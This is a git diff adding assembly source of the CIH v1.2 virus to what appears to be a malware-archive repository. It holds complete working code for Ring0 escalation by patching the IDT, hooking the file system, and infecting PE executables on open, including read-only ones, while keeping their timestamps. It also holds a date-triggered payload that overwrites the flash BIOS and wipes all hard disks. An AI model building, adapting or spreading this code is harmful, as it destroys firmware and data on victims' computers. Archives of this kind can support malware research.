mov [ebx+1ch], eax ; Modify EAX Value in Stack + +; *************************** +; * After Calling pIFSFunc, * +; * Get Some Data from the * +; * Returned pioreq. * +; *************************** + + cmp dword ptr [ebx+20h+04h+04h], 00000024h + jne QuitMyVirusFileSystemHook + +; ***************** +; * Get the File * +; * Modification * +; * Date and Time * +; * in DOS Format.* +; ***************** + + mov eax, [ecx+28h] + mov (FileModificationTime-@6)[esi], eax + +; *************************** +; * Quit My Virus' * +; * IFSMgr_FileSystemHook * +; *************************** + +QuitMyVirusFileSystemHook: + + popad + + ret + +; ************************************* +; * Kill Computer !? ... 
*^_^* * +; ************************************* + +IsKillComputer: + ; Get Now Month from BIOS CMOS + mov ax, 0708h + out 70h, al + in al, 71h + + xchg ah, al + + ; Get Now Day from BIOS CMOS + out 70h, al + in al, 71h + + xor ax, 0426h ; 04/26/???? + jne DisableOnBusy + +; ************************************** +; * Kill Kill Kill Kill Kill Kill Kill * +; * Kill Kill Kill Kill Kill Kill Kill * +; * Kill Kill Kill Kill Kill Kill Kill * +; * Kill Kill Kill Kill Kill Kill Kill * +; * Kill Kill Kill Kill Kill Kill Kill * +; * Kill Kill Kill Kill Kill Kill Kill * +; * Kill Kill Kill Kill Kill Kill Kill * +; * Kill Kill Kill Kill Kill Kill Kill * +; * Kill Kill Kill Kill Kill Kill Kill * +; * Kill Kill Kill Kill Kill Kill Kill * +; * Kill Kill Kill Kill Kill Kill Kill * +; * Kill Kill Kill Kill Kill Kill Kill * +; * Kill Kill Kill Kill Kill Kill Kill * +; * Kill Kill Kill Kill Kill Kill Kill * +; * Kill Kill Kill Kill Kill Kill Kill * +; * Kill Kill Kill Kill Kill Kill Kill * +; * Kill Kill Kill Kill Kill Kill Kill * +; * Kill Kill Kill Kill Kill Kill Kill * +; ************************************** + +; *************************** +; * Kill BIOS EEPROM * +; *************************** + + mov bp, 0cf8h + lea esi, IOForEEPROM-@7[esi] + +; *********************** +; * Show BIOS Page in * +; * 000E0000 - 000EFFFF * +; * ( 64 KB ) * +; *********************** + + mov edi, 8000384ch + mov dx, 0cfeh + cli + call esi + +; *********************** +; * Show BIOS Page in * +; * 000F0000 - 000FFFFF * +; * ( 64 KB ) * +; *********************** + + mov di, 0058h + dec edx ; and al,0fh + mov word ptr (BooleanCalculateCode-@10)[esi], 0f24h + call esi + +; *********************** +; * Show the BIOS Extra * +; * ROM Data in Memory * +; * 000E0000 - 000E01FF * +; * ( 512 Bytes ) * +; * , and the Section * +; * of Extra BIOS can * +; * be Writted... 
* +; *********************** + + lea ebx, EnableEEPROMToWrite-@10[esi] + + mov eax, 0e5555h + mov ecx, 0e2aaah + call ebx + mov byte ptr [eax], 60h + + push ecx + loop $ + +; *********************** +; * Kill the BIOS Extra * +; * ROM Data in Memory * +; * 000E0000 - 000E007F * +; * ( 80h Bytes ) * +; *********************** + + xor ah, ah + mov [eax], al + + xchg ecx, eax + loop $ + +; *********************** +; * Show and Enable the * +; * BIOS Main ROM Data * +; * 000E0000 - 000FFFFF * +; * ( 128 KB ) * +; * can be Writted... * +; *********************** + + mov eax, 0f5555h + pop ecx + mov ch, 0aah + call ebx + mov byte ptr [eax], 20h + + loop $ + +; *********************** +; * Kill the BIOS Main * +; * ROM Data in Memory * +; * 000FE000 - 000FE07F * +; * ( 80h Bytes ) * +; *********************** + + mov ah, 0e0h + mov [eax], al + +; *********************** +; * Hide BIOS Page in * +; * 000F0000 - 000FFFFF * +; * ( 64 KB ) * +; *********************** + ; or al,10h + mov word ptr (BooleanCalculateCode-@10)[esi], 100ch + call esi + +; *************************** +; * Kill All HardDisk * +; *************************************************** +; * IOR Structure of IOS_SendCommand Needs * +; *************************************************** +; * ?? ?? ?? ?? 01 00 ?? ?? 01 05 00 40 ?? ?? ?? ?? * +; * 00 00 00 00 00 00 00 00 00 08 00 00 00 10 00 c0 * +; * ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? * +; * ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? * +; * ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 80 ?? ?? 
* +; *************************************************** + +KillHardDisk: + xor ebx, ebx + mov bh, FirstKillHardDiskNumber + push ebx + sub esp, 2ch + push 0c0001000h + mov bh, 08h + push ebx + push ecx + push ecx + push ecx + push 40000501h + inc ecx + push ecx + push ecx + + mov esi, esp + sub esp, 0ach + +LoopOfKillHardDisk: + int 20h + dd 00100004h ; VXDCall IOS_SendCommand + + cmp word ptr [esi+06h], 0017h + je KillNextDataSection + +ChangeNextHardDisk: + inc byte ptr [esi+4dh] + + jmp LoopOfKillHardDisk + +KillNextDataSection: + add dword ptr [esi+10h], ebx + mov byte ptr [esi+4dh], FirstKillHardDiskNumber + + jmp LoopOfKillHardDisk + +; *************************** +; * Enable EEPROM to Write * +; *************************** + +EnableEEPROMToWrite: + mov [eax], cl + mov [ecx], al + mov byte ptr [eax], 80h + mov [eax], cl + mov [ecx], al + + ret + +; *************************** +; * IO for EEPROM * +; *************************** + +IOForEEPROM: +@10 = IOForEEPROM + + xchg eax, edi + xchg edx, ebp + out dx, eax + + xchg eax, edi + xchg edx, ebp + in al, dx + +BooleanCalculateCode = $ + or al, 44h + + xchg eax, edi + xchg edx, ebp + out dx, eax + + xchg eax, edi + xchg edx, ebp + out dx, al + + ret + +; ********************************************************* +; * Static Data * +; ********************************************************* + +LastVxDCallAddress = IFSMgr_Ring0_FileIO +VxDCallAddressTable db 00h + db IFSMgr_RemoveFileSystemApiHook-_PageAllocate + db UniToBCSPath-IFSMgr_RemoveFileSystemApiHook + db IFSMgr_Ring0_FileIO-UniToBCSPath + +VxDCallIDTable dd 00010053h, 00400068h, 00400041h, 00400032h +VxDCallTableSize = ($-VxDCallIDTable)/04h + +; ********************************************************* +; * Virus Version Copyright * +; ********************************************************* + +VirusVersionCopyright db 'CIH v' + db MajorVirusVersion+'0' + db '.' 
+ db MinorVirusVersion+'0' + db ' TTIT' + +; ********************************************************* +; * Virus Size * +; ********************************************************* + +VirusSize = $ +; + SizeOfVirusCodeSectionTableEndMark(04h) +; + NumberOfSections(??)*SizeOfVirusCodeSectionTable(08h) +; + SizeOfTheFirstVirusCodeSectionTable(04h) + +; ********************************************************* +; * Dynamic Data * +; ********************************************************* + +VirusGameDataStartAddress = VirusSize +@6 = VirusGameDataStartAddress +OnBusy db 0 +FileModificationTime dd ? + +FileNameBuffer db FileNameBufferSize dup(?) +@7 = FileNameBuffer + +DataBuffer = $ +@8 = DataBuffer +NumberOfSections dw ? +TimeDateStamp dd ? +SymbolsPointer dd ? +NumberOfSymbols dd ? +SizeOfOptionalHeader dw ? +_Characteristics dw ? +Magic dw ? +LinkerVersion dw ? +SizeOfCode dd ? +SizeOfInitializedData dd ? +SizeOfUninitializedData dd ? +AddressOfEntryPoint dd ? +BaseOfCode dd ? +BaseOfData dd ? +ImageBase dd ? +@9 = $ +SectionAlignment dd ? +FileAlignment dd ? +OperatingSystemVersion dd ? +ImageVersion dd ? +SubsystemVersion dd ? +Reserved dd ? +SizeOfImage dd ? +SizeOfHeaders dd ? 
+SizeOfImageHeaderToRead = $-NumberOfSections + +NewAddressOfEntryPoint = DataBuffer ; DWORD +SizeOfImageHeaderToWrite = 04h + +StartOfSectionTable = @9 +SectionName = StartOfSectionTable ; QWORD +VirtualSize = StartOfSectionTable+08h ; DWORD +VirtualAddress = StartOfSectionTable+0ch ; DWORD +SizeOfRawData = StartOfSectionTable+10h ; DWORD +PointerToRawData = StartOfSectionTable+14h ; DWORD +PointerToRelocations = StartOfSectionTable+18h ; DWORD +PointerToLineNumbers = StartOfSectionTable+1ch ; DWORD +NumberOfRelocations = StartOfSectionTable+20h ; WORD +NumberOfLinenNmbers = StartOfSectionTable+22h ; WORD +Characteristics = StartOfSectionTable+24h ; DWORD +SizeOfScetionTable = Characteristics+04h-SectionName + +; ********************************************************* +; * Virus Total Need Memory * +; ********************************************************* + +VirusNeedBaseMemory = $ + +VirusTotalNeedMemory = @9 +; + NumberOfSections(??)*SizeOfScetionTable(28h) +; + SizeOfVirusCodeSectionTableEndMark(04h) +; + NumberOfSections(??)*SizeOfVirusCodeSectionTable(08h) +; + SizeOfTheFirstVirusCodeSectionTable(04h) + +; ********************************************************* +; ********************************************************* + +VirusGame ENDS + + END FileHeader \ No newline at end of file diff --git a/MSDOS/Virus.MSDOS.Unknown.cih_12_2.asm b/MSDOS/Virus.MSDOS.Unknown.cih_12_2.asm new file mode 100644 index 00000000..044ca02d --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.cih_12_2.asm 
@@ -0,0 +1,1480 @@ +; **************************************************************************** +; * The Virus Program Information * +; **************************************************************************** +; * * +; * Designer : CIH Original Place : TTIT of Taiwan * +; * Create Date : 04/26/1998 Now Version : 1.2 * +; * Modification Time : 05/21/1998 * +; * * +; *==========================================================================* +; * Modification History * +; *==========================================================================* +; * v1.0 1. Create the Virus Program. * +; * 2. The Virus Modifies IDT to Get Ring0 Privilege. * +; * 04/26/1998 3. Virus Code doesn't Reload into System. * +; * 4. Call IFSMgr_InstallFileSystemApiHook to Hook File System. * +; * 5. Modifies Entry Point of IFSMgr_InstallFileSystemApiHook. * +; * 6. When System Opens Existing PE File, the File will be * +; * Infected, and the File doesn't be Reinfected. * +; * 7. It is also Infected, even the File is Read-Only. * +; * 8. When the File is Infected, the Modification Date and Time * +; * of the File also don't be Changed. * +; * 9. When My Virus Uses IFSMgr_Ring0_FileIO, it will not Call * +; * Previous FileSystemApiHook, it will Call the Function * +; * that the IFS Manager Would Normally Call to Implement * +; * this Particular I/O Request. * +; * 10. The Virus Size is only 656 Bytes. * +; *==========================================================================* +; * v1.1 1. Especially, the File that be Infected will not Increase * +; * it's Size... ^__^ * +; * 05/15/1998 2. Hook and Modify Structured Exception Handing. * +; * When Exception Error Occurs, Our OS System should be in * +; * Windows NT. So My Cute Virus will not Continue to Run, * +; * it will Jmup to Original Application to Run. * +; * 3. Use Better Algorithm, Reduce Virus Code Size. * +; * 4. The Virus "Basic" Size is only 796 Bytes. 
* +; *==========================================================================* +; * v1.2 1. Kill All HardDisk, and BIOS... Super... Killer... * +; * 2. Modify the Bug of v1.1 * +; * 05/21/1998 3. The Virus "Basic" Size is 1003 Bytes. * +; **************************************************************************** + + .586P + +; **************************************************************************** +; * Original PE Executable File(Don't Modify this Section) * +; **************************************************************************** + +OriginalAppEXE SEGMENT + +FileHeader: + db 04dh, 05ah, 090h, 000h, 003h, 000h, 000h, 000h + db 004h, 000h, 000h, 000h, 0ffh, 0ffh, 000h, 000h + db 0b8h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 040h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 080h, 000h, 000h, 000h + db 00eh, 01fh, 0bah, 00eh, 000h, 0b4h, 009h, 0cdh + db 021h, 0b8h, 001h, 04ch, 0cdh, 021h, 054h, 068h + db 069h, 073h, 020h, 070h, 072h, 06fh, 067h, 072h + db 061h, 06dh, 020h, 063h, 061h, 06eh, 06eh, 06fh + db 074h, 020h, 062h, 065h, 020h, 072h, 075h, 06eh + db 020h, 069h, 06eh, 020h, 044h, 04fh, 053h, 020h + db 06dh, 06fh, 064h, 065h, 02eh, 00dh, 00dh, 00ah + db 024h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 050h, 045h, 000h, 000h, 04ch, 001h, 001h, 000h + db 0f1h, 068h, 020h, 035h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 0e0h, 000h, 00fh, 001h + db 00bh, 001h, 005h, 000h, 000h, 010h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 010h, 010h, 000h, 000h, 000h, 010h, 000h, 000h + db 000h, 020h, 000h, 000h, 000h, 000h, 040h, 000h + db 000h, 010h, 000h, 000h, 000h, 002h, 000h, 000h + db 004h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 004h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 020h, 000h, 000h, 000h, 002h, 000h, 000h + 
db 000h, 000h, 000h, 000h, 002h, 000h, 000h, 000h + db 000h, 000h, 010h, 000h, 000h, 010h, 000h, 000h + db 000h, 000h, 010h, 000h, 000h, 010h, 000h, 000h + db 000h, 000h, 000h, 000h, 010h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 02eh, 074h, 065h, 078h, 074h, 000h, 000h, 000h + db 000h, 010h, 000h, 000h, 000h, 010h, 000h, 000h + db 000h, 010h, 000h, 000h, 000h, 002h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 020h, 000h, 000h, 060h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 0c3h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + dd 00000000h, VirusSize 
+ +OriginalAppEXE ENDS + +; **************************************************************************** +; * My Virus Game * +; **************************************************************************** + +; ********************************************************* +; * Constant Define * +; ********************************************************* + +TRUE = 1 +FALSE = 0 + +DEBUG = TRUE + +MajorVirusVersion = 1 +MinorVirusVersion = 2 + +VirusVersion = MajorVirusVersion*10h+MinorVirusVersion + + +IF DEBUG + + FirstKillHardDiskNumber = 81h + HookExceptionNumber = 05h + +ELSE + + FirstKillHardDiskNumber = 80h + HookExceptionNumber = 03h + +ENDIF + + +FileNameBufferSize = 7fh + +; ********************************************************* +; ********************************************************* + +VirusGame SEGMENT + + ASSUME CS:VirusGame, DS:VirusGame, SS:VirusGame + ASSUME ES:VirusGame, FS:VirusGame, GS:VirusGame + +; ********************************************************* +; * Ring3 Virus Game Initial Program * +; ********************************************************* + +MyVirusStart: + push ebp + +; ************************************* +; * Let's Modify Structured Exception * +; * Handing, Prevent Exception Error * +; * Occurrence, Especially in NT. * +; ************************************* + + lea eax, [esp-04h*2] + + xor ebx, ebx + xchg eax, fs:[ebx] + + call @0 +@0: + pop ebx + + lea ecx, StopToRunVirusCode-@0[ebx] + push ecx + + push eax + +; ************************************* +; * Let's Modify * +; * IDT(Interrupt Descriptor Table) * +; * to Get Ring0 Privilege... 
* +; ************************************* + + push eax ; + sidt [esp-02h] ; Get IDT Base Address + pop ebx ; + + add ebx, HookExceptionNumber*08h+04h ; ZF = 0 + + cli + + mov ebp, [ebx] ; Get Exception Base + mov bp, [ebx-04h] ; Entry Point + + lea esi, MyExceptionHook-@1[ecx] + + push esi + + mov [ebx-04h], si ; + shr esi, 16 ; Modify Exception + mov [ebx+02h], si ; Entry Point Address + + pop esi + +; ************************************* +; * Generate Exception to Get Ring0 * +; ************************************* + + int HookExceptionNumber ; GenerateException +ReturnAddressOfEndException = $ + +; ************************************* +; * Merge All Virus Code Section * +; ************************************* + + push esi + mov esi, eax + +LoopOfMergeAllVirusCodeSection: + + mov ecx, [eax-04h] + + rep movsb + + sub eax, 08h + + mov esi, [eax] + + or esi, esi + jz QuitLoopOfMergeAllVirusCodeSection ; ZF = 1 + + jmp LoopOfMergeAllVirusCodeSection + +QuitLoopOfMergeAllVirusCodeSection: + + pop esi + +; ************************************* +; * Generate Exception Again * +; ************************************* + + int HookExceptionNumber ; GenerateException Again + +; ************************************* +; * Let's Restore * +; * Structured Exception Handing * +; ************************************* + +ReadyRestoreSE: + sti + + xor ebx, ebx + + jmp RestoreSE + +; ************************************* +; * When Exception Error Occurs, * +; * Our OS System should be in NT. * +; * So My Cute Virus will not * +; * Continue to Run, it Jmups to * +; * Original Application to Run. 
* +; ************************************* + +StopToRunVirusCode: +@1 = StopToRunVirusCode + + xor ebx, ebx + mov eax, fs:[ebx] + mov esp, [eax] + +RestoreSE: + pop dword ptr fs:[ebx] + pop eax + +; ************************************* +; * Return Original App to Execute * +; ************************************* + + pop ebp + + push 00401000h ; Push Original +OriginalAddressOfEntryPoint = $-4 ; App Entry Point to Stack + + ret ; Return to Original App Entry Point + +; ********************************************************* +; * Ring0 Virus Game Initial Program * +; ********************************************************* + +MyExceptionHook: +@2 = MyExceptionHook + + jz InstallMyFileSystemApiHook + +; ************************************* +; * Do My Virus Exist in System !? * +; ************************************* + + mov ecx, dr0 + jecxz AllocateSystemMemoryPage + + add dword ptr [esp], ReadyRestoreSE-ReturnAddressOfEndException + +; ************************************* +; * Return to Ring3 Initial Program * +; ************************************* + +ExitRing0Init: + mov [ebx-04h], bp ; + shr ebp, 16 ; Restore Exception + mov [ebx+02h], bp ; + + iretd + +; ************************************* +; * Allocate SystemMemory Page to Use * +; ************************************* + +AllocateSystemMemoryPage: + + mov dr0, ebx ; Set the Mark of My Virus Exist in System + + push 00000000fh ; + push ecx ; + push 0ffffffffh ; + push ecx ; + push ecx ; + push ecx ; + push 000000001h ; + push 000000002h ; + int 20h ; VMMCALL _PageAllocate +_PageAllocate = $ ; + dd 00010053h ; Use EAX, ECX, EDX, and flags + add esp, 08h*04h + + xchg edi, eax ; EDI = SystemMemory Start Address + + lea eax, MyVirusStart-@2[esi] + + iretd ; Return to Ring3 Initial Program + +; ************************************* +; * Install My File System Api Hook * +; ************************************* + +InstallMyFileSystemApiHook: + + lea eax, FileSystemApiHook-@6[edi] + + push eax ; + int 20h ; 
VXDCALL IFSMgr_InstallFileSystemApiHook +IFSMgr_InstallFileSystemApiHook = $ ; + dd 00400067h ; Use EAX, ECX, EDX, and flags + + mov dr0, eax ; Save OldFileSystemApiHook Address + + pop eax ; EAX = FileSystemApiHook Address + + ; Save Old IFSMgr_InstallFileSystemApiHook Entry Point + mov ecx, IFSMgr_InstallFileSystemApiHook-@2[esi] + mov edx, [ecx] + mov OldInstallFileSystemApiHook-@3[eax], edx + + ; Modify IFSMgr_InstallFileSystemApiHook Entry Point + lea eax, InstallFileSystemApiHook-@3[eax] + mov [ecx], eax + + cli + + jmp ExitRing0Init + +; ********************************************************* +; * Code Size of Merge Virus Code Section * +; ********************************************************* + +CodeSizeOfMergeVirusCodeSection = offset $ + +; ********************************************************* +; * IFSMgr_InstallFileSystemApiHook * +; ********************************************************* + +InstallFileSystemApiHook: + push ebx + + call @4 ; +@4: ; + pop ebx ; mov ebx, offset FileSystemApiHook + add ebx, FileSystemApiHook-@4 ; + + push ebx + int 20h ; VXDCALL IFSMgr_RemoveFileSystemApiHook +IFSMgr_RemoveFileSystemApiHook = $ + dd 00400068h ; Use EAX, ECX, EDX, and flags + pop eax + + ; Call Original IFSMgr_InstallFileSystemApiHook + ; to Link Client FileSystemApiHook + push dword ptr [esp+8] + call OldInstallFileSystemApiHook-@3[ebx] + pop ecx + + push eax + + ; Call Original IFSMgr_InstallFileSystemApiHook + ; to Link My FileSystemApiHook + push ebx + call OldInstallFileSystemApiHook-@3[ebx] + pop ecx + + mov dr0, eax ; Adjust OldFileSystemApiHook Address + + pop eax + + pop ebx + + ret + +; ********************************************************* +; * Static Data * +; ********************************************************* + +OldInstallFileSystemApiHook dd ? 
+ +; ********************************************************* +; * IFSMgr_FileSystemHook * +; ********************************************************* + +; ************************************* +; * IFSMgr_FileSystemHook Entry Point * +; ************************************* + +FileSystemApiHook: +@3 = FileSystemApiHook + + pushad + + call @5 ; +@5: ; + pop esi ; mov esi, offset VirusGameDataStartAddress + add esi, VirusGameDataStartAddress-@5 + +; ************************************* +; * Is OnBusy !? * +; ************************************* + + test byte ptr (OnBusy-@6)[esi], 01h ; if ( OnBusy ) + jnz pIFSFunc ; goto pIFSFunc + +; ************************************* +; * Is OpenFile !? * +; ************************************* + + ; if ( NotOpenFile ) + ; goto prevhook + lea ebx, [esp+20h+04h+04h] + cmp dword ptr [ebx], 00000024h + jne prevhook + +; ************************************* +; * Enable OnBusy * +; ************************************* + + inc byte ptr (OnBusy-@6)[esi] ; Enable OnBusy + +; ************************************* +; * Get FilePath's DriveNumber, * +; * then Set the DriveName to * +; * FileNameBuffer. * +; ************************************* +; * Ex. If DriveNumber is 03h, * +; * DriveName is 'C:'. * +; ************************************* + + ; mov esi, offset FileNameBuffer + add esi, FileNameBuffer-@6 + + push esi + + mov al, [ebx+04h] + cmp al, 0ffh + je CallUniToBCSPath + + add al, 40h + mov ah, ':' + + mov [esi], eax + + inc esi + inc esi + +; ************************************* +; * UniToBCSPath * +; ************************************* +; * This Service Converts * +; * a Canonicalized Unicode Pathname * +; * to a Normal Pathname in the * +; * Specified BCS Character Set. 
* +; ************************************* + +CallUniToBCSPath: + push 00000000h + push FileNameBufferSize + mov ebx, [ebx+10h] + mov eax, [ebx+0ch] + add eax, 04h + push eax + push esi + int 20h ; VXDCall UniToBCSPath +UniToBCSPath = $ + dd 00400041h + add esp, 04h*04h + +; ************************************* +; * Is FileName '.EXE' !? * +; ************************************* + + ; cmp [esi+eax-04h], '.EXE' + cmp [esi+eax-04h], 'EXE.' + pop esi + jne DisableOnBusy + +IF DEBUG + +; ************************************* +; * Only for Debug * +; ************************************* + + ; cmp [esi+eax-06h], 'FUCK' + cmp [esi+eax-06h], 'KCUF' + jne DisableOnBusy + +ENDIF + +; ************************************* +; * Is Open Existing File !? * +; ************************************* + + ; if ( NotOpenExistingFile ) + ; goto DisableOnBusy + cmp word ptr [ebx+18h], 01h + jne DisableOnBusy + +; ************************************* +; * Get Attributes of the File * +; ************************************* + + mov ax, 4300h + int 20h ; VXDCall IFSMgr_Ring0_FileIO +IFSMgr_Ring0_FileIO = $ + dd 00400032h + + jc DisableOnBusy + + push ecx + +; ************************************* +; * Get IFSMgr_Ring0_FileIO Address * +; ************************************* + + mov edi, dword ptr (IFSMgr_Ring0_FileIO-@7)[esi] + mov edi, [edi] + +; ************************************* +; * Is Read-Only File !? 
* +; ************************************* + + test cl, 01h + jz OpenFile + +; ************************************* +; * Modify Read-Only File to Write * +; ************************************* + + mov ax, 4301h + xor ecx, ecx + call edi ; VXDCall IFSMgr_Ring0_FileIO + +; ************************************* +; * Open File * +; ************************************* + +OpenFile: + xor eax, eax + mov ah, 0d5h + xor ecx, ecx + xor edx, edx + inc edx + mov ebx, edx + inc ebx + call edi ; VXDCall IFSMgr_Ring0_FileIO + + xchg ebx, eax ; mov ebx, FileHandle + +; ************************************* +; * Need to Restore * +; * Attributes of the File !? * +; ************************************* + + pop ecx + + pushf + + test cl, 01h + jz IsOpenFileOK + +; ************************************* +; * Restore Attributes of the File * +; ************************************* + + mov ax, 4301h + call edi ; VXDCall IFSMgr_Ring0_FileIO + +; ************************************* +; * Is Open File OK !? * +; ************************************* + +IsOpenFileOK: + popf + + jc DisableOnBusy + +; ************************************* +; * Open File Already Succeed. ^__^ * +; ************************************* + + push esi ; Push FileNameBuffer Address to Stack + + pushf ; Now CF = 0, Push Flag to Stack + + add esi, DataBuffer-@7 ; mov esi, offset DataBuffer + +; *************************** +; * Get OffsetToNewHeader * +; *************************** + + xor eax, eax + mov ah, 0d6h + + ; For Doing Minimal VirusCode's Length, + ; I Save EAX to EBP. + mov ebp, eax + + xor ecx, ecx + mov cl, 04h + xor edx, edx + mov dl, 3ch + call edi ; VXDCall IFSMgr_Ring0_FileIO + + mov edx, [esi] + +; *************************** +; * Get 'PE\0' Signature * +; * of ImageFileHeader, and * +; * Infected Mark. * +; *************************** + + dec edx + + mov eax, ebp + call edi ; VXDCall IFSMgr_Ring0_FileIO + +; *************************** +; * Is PE !? 
* +; *************************** +; * Is the File * +; * Already Infected !? * +; *************************** + + ; cmp [esi], '\0PE\0' + cmp dword ptr [esi], 00455000h + jne CloseFile + +; ************************************* +; * The File is ^o^ * +; * PE(Portable Executable) indeed. * +; ************************************* +; * The File isn't also Infected. * +; ************************************* + +; ************************************* +; * Start to Infect the File * +; ************************************* +; * Registers Use Status Now : * +; * * +; * EAX = 04h * +; * EBX = File Handle * +; * ECX = 04h * +; * EDX = 'PE\0\0' Signature of * +; * ImageFileHeader Pointer's * +; * Former Byte. * +; * ESI = DataBuffer Address ==> @8 * +; * EDI = IFSMgr_Ring0_FileIO Address * +; * EBP = D600h ==> Read Data in File * +; ************************************* +; * Stack Dump : * +; * * +; * ESP => ------------------------- * +; * | EFLAG(CF=0) | * +; * ------------------------- * +; * | FileNameBufferPointer | * +; * ------------------------- * +; * | EDI | * +; * ------------------------- * +; * | ESI | * +; * ------------------------- * +; * | EBP | * +; * ------------------------- * +; * | ESP | * +; * ------------------------- * +; * | EBX | * +; * ------------------------- * +; * | EDX | * +; * ------------------------- * +; * | ECX | * +; * ------------------------- * +; * | EAX | * +; * ------------------------- * +; * | Return Address | * +; * ------------------------- * +; ************************************* + + push ebx ; Save File Handle + + push 00h ; Set VirusCodeSectionTableEndMark + +; *************************** +; * Let's Set the * +; * Virus' Infected Mark * +; *************************** + + push 01h ; Size + push edx ; Pointer of File + push edi ; Address of Buffer + +; *************************** +; * Save ESP Register * +; *************************** + + mov dr1, esp + +; *************************** +; * Let's Set the * +; * 
NewAddressOfEntryPoint * +; * ( Only First Set Size ) * +; *************************** + + push eax ; Size + +; *************************** +; * Let's Read * +; * Image Header in File * +; *************************** + + mov eax, ebp + mov cl, SizeOfImageHeaderToRead + add edx, 07h ; Move EDX to NumberOfSections + call edi ; VXDCall IFSMgr_Ring0_FileIO + +; *************************** +; * Let's Set the * +; * NewAddressOfEntryPoint * +; * ( Set Pointer of File, * +; * Address of Buffer ) * +; *************************** + + lea eax, (AddressOfEntryPoint-@8)[edx] + push eax ; Pointer of File + + lea eax, (NewAddressOfEntryPoint-@8)[esi] + push eax ; Address of Buffer + +; *************************** +; * Move EDX to the Start * +; * of SectionTable in File * +; *************************** + + movzx eax, word ptr (SizeOfOptionalHeader-@8)[esi] + lea edx, [eax+edx+12h] + +; *************************** +; * Let's Get * +; * Total Size of Sections * +; *************************** + + mov al, SizeOfScetionTable + + ; I Assume NumberOfSections <= 0ffh + mov cl, (NumberOfSections-@8)[esi] + + mul cl + +; *************************** +; * Let's Set Section Table * +; *************************** + + ; Move ESI to the Start of SectionTable + lea esi, (StartOfSectionTable-@8)[esi] + + push eax ; Size + push edx ; Pointer of File + push esi ; Address of Buffer + +; *************************** +; * The Code Size of Merge * +; * Virus Code Section and * +; * Total Size of Virus * +; * Code Section Table Must * +; * be Small or Equal the * +; * Unused Space Size of * +; * Following Section Table * +; *************************** + + inc ecx + push ecx ; Save NumberOfSections+1 + + shl ecx, 03h + push ecx ; Save TotalSizeOfVirusCodeSectionTable + + add ecx, eax + add ecx, edx + + sub ecx, (SizeOfHeaders-@9)[esi] + jnc short OnlySetInfectedMark + + not ecx + inc ecx + + cmp cx, small CodeSizeOfMergeVirusCodeSection + jb OnlySetInfectedMark + +; *************************** +; * Save 
Original * +; * Address of Entry Point * +; *************************** + + ; Save My Virus First Section Code + ; Size of Following Section Table... + ; ( Not Include the Size of Virus Code Section Table ) + push ecx + + xchg ecx, eax ; ECX = Size of Section Table + + mov eax, (AddressOfEntryPoint-@9)[esi] + add eax, (ImageBase-@9)[esi] + mov (OriginalAddressOfEntryPoint-@9)[esi], eax + +; *************************** +; * Read All Section Tables * +; *************************** + + mov eax, ebp + call edi ; VXDCall IFSMgr_Ring0_FileIO + +; *************************** +; * Let's Set Total Virus * +; * Code Section Table * +; *************************** + + ; EBX = My Virus First Section Code + ; Size of Following Section Table + pop ebx + pop edi ; EDI = TotalSizeOfVirusCodeSectionTable + pop ecx ; ECX = NumberOfSections+1 + + push edi ; Size + + add edx, eax + push edx ; Pointer of File + + add eax, esi + push eax ; Address of Buffer + +; *************************** +; * Set the First Virus * +; * Code Section Size in * +; * VirusCodeSectionTable * +; *************************** + + lea eax, [eax+edi-04h] + mov [eax], ebx + +; *************************** +; * Let's Set My Virus * +; * First Section Code * +; *************************** + + push ebx ; Size + + add edx, edi + push edx ; Pointer of File + + lea edi, (MyVirusStart-@9)[esi] + push edi ; Address of Buffer + +; *************************** +; * Let's Modify the * +; * AddressOfEntryPoint to * +; * My Virus 